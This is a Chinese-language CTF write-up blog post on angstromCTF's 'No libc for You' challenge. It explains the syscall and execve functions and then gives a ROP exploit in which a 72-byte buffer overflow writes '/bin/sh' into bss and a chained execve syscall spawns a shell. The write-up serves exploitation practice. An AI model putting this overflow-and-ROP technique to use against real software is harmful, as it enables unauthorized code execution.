angstromctf -No libc for You
2024-08-30 11:02:31
0x00 syscall
syscall函数原型为:
int syscall(int number, ...)
其中number是系统调用号,number后面应顺序接上该系统调用的所有参数.大概意思是当调用syscall函数时,系统会去syscall调用表中寻找对应的系统函数,再把相应的参数赋给要调用的函数,然后执行该函数。 例如:调用read函数
syscall(0,0,buf,8)
- 0 是系统函数read的调用号,相当于执行read(0,buf,8)
详细说明:
0x01 execve
execve函数原型
int execve(const char * filename,char * const argv[ ],char * const envp[ ])
execve()用来执行参数filename字符串所代表的文件路径,第二个参数是利用指针数组来传递给执行文件,并且需要以空指针(NULL)结束,最后一个参数则为传递给执行文件的新环境变量数组。 例如:执行/bin/sh
execve("/bin/sh",0,0)
详细说明:
0x02 No libc for You
1.思路
先将/bin/sh写入bss,再通过syscall调用execve('/bin/sh')获得shell
2.写/bin/sh到bss
#write_bss
payload = "A" * 72
payload += p64(pop_rdi) + p64(bss_addr)
payload += p64(gets_addr)
payload += p64(vuln_addr)
s.sendline(payload)
s.sendline("/bin/sh\0")
3.调用execve('/bin/sh')
# get_shell
payload = "A" * 72
payload += p64(rax_rdx_rbx_ret) + p64(0x3b) + p64(0) + p64(0)
payload += p64(rsi_ret) + p64(0)
payload += p64(pop_rdi) + p64(bss_addr)
payload += p64(syscall)
s.sendline(payload)
0x03 新姿势
1.printf
函数名 :printf
函数原型:int printf (char * format,args,···);
功能:按format指向的格式字符串所规定的格式,将输出表列args的值输出到标准输出设备。
返回值:输出字符的个数,若出错,则返回负数。
说明:format可以是一个字符串,或字符数组的起始地址
2. linux系统调用
LINUX SYSTEM CALL TABLE FOR X86 64
最新文章
- mpt_voronoi demo
- 重拾smslib
- 链地址法实现HashMap
- iOS:基于AVPlayer实现的视频播放器
- BCP及自增标识列
- Create your first isolated Python environment
- [Unity3D]unity3d5.0简单的调用摄像头
- Bash简介
- org.unsaved transient instance - save the transient instance before flushing: bug解决方案
- ti processor sdk linux am335x evm /bin/setup-targetfs-nfs.sh hacking
- Centos6 编译安装局域网NTP服务器
- C#中对于可变性的限制
- hdu 5451(矩阵 +Fibonacci )
- netty源码学习
- bzoj4025二分图(线段树分治 并查集)
- python3.x 读写文件要使用UTF8编码的话需要。。
- java项目中oracle配置说明
- Ubuntu 12.04 安装Redis并设置主从复制
- JVM系列三:JVM参数设置
- Fisher精确检验【转载】